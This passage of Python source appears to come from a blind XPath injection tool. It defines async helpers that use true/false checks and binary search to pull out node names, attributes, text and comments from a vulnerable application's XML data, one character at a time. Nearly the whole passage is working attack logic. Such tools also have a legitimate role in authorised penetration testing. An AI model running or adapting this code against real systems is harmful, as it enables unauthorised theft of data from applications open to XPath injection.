    text_node_count = await count(context, expression.text)
    text_contents = await asyncio.gather(
        *iterate_all(context, expression.text(text_node_count))
    )

    return "".join(text_contents)


async def get_node_comments(context: AttackContext, expression):
    comments_count = await count(context, expression.comments)
    futures = [get_string(context, comment) for comment in expression.comments(comments_count)]
    return await asyncio.gather(*futures)


async def binary_search(context: AttackContext, expression, min, max=25):
    if await check(context, expression > max):
        return await binary_search(context, expression, min, max * 2)

    while True:
        if max < min:
            return -1

        midpoint = (min + max) // 2

        if await check(context, expression < midpoint):
            max = midpoint - 1
        elif await check(context, expression > midpoint):
            min = midpoint + 1
        else:
            return midpoint


async def substring_search(context: AttackContext, expression):
    # Small issue:
    # string-length(substring-before('abc','z')) == 0
    # string-length(substring-before('abc','a')) == 0
    # So we need to explicitly check if the expression is equal to the first char in our search space.
    # Not optimal, but still works out fairly efficient.

    if await check(context, expression == ASCII_SEARCH_SPACE[0]):
        return ASCII_SEARCH_SPACE[0]

    result = await binary_search(
        context,
        func.string_length(func.substring_before(ASCII_SEARCH_SPACE, expression)),
        min=0,
        max=len(ASCII_SEARCH_SPACE))
    if result <= 0:
        return None
    else:
        return ASCII_SEARCH_SPACE[result]


async def codepoint_search(context: AttackContext, expression):
    result = await binary_search(
        context,
        expression=func.string_to_codepoints(expression),
        min=0,
        max=255)
    if result <= 0:
        return None
    else:
        return chr(result)


async def get_nodes(context: AttackContext, starting_path=ROOT_NODE):
    attributes, child_node_count, text_content, comments, node_name = await asyncio.gather(
        get_node_attributes(context, starting_path),
        count(context, starting_path.children),
        get_all_text(context, starting_path),
        get_node_comments(context, starting_path),
        get_string(context, starting_path.name)
    )
    return (XMLNode(name=node_name, attributes=attributes, text=text_content, comments=comments),
            [get_nodes(context, starting_path=child) for child in starting_path.children(child_node_count)])


async def get_node_attributes(context: AttackContext, node):
    attribute_count = await count(context, node.attributes)

    async def _get_attributes_task(attr):
        return await asyncio.gather(get_string(context, attr.name), get_string(context, attr))

    results = await asyncio.gather(*[_get_attributes_task(attr) for attr in node.attributes(attribute_count)])

    return dict(results)
